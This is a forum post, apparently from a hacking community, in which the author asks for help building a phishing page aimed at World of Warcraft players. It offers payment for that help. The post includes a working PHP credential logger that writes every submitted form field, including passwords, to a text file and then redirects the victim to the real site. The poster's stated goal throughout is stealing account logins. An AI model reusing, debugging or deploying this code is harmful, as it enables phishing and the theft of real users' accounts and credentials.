k, I have the tcg phisher, but it gives an error about acctverify(2) or some shit and it won't work, so I've been trying to merge two different phishers together for the past 3 hours now and havn't had any luck with it.
I try setting the tcg phishing homepage as the index, use a differen't login (it's .xhtml if that makes a difference) and I make it go to the success page of the tcg phisher.
The main problem is getting the passwords to be logged. I've tried .txt, the .log from the tcg phisher, and a blank .html. It's been very tedious, I'm just looking for some help. Seriously.
The php coding I've been using is
Code:
<?php
header ('Location: http://www.worldofwarcraft.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
I've put this coding as the action or w/e on the login page; Nothing has worked, if anyone is good with this stuff it would be awesome if you could add me on msn and try to help me out with this stuff, I will be willing to +rep and even offer some paypal cash.
Thanks guys :wave: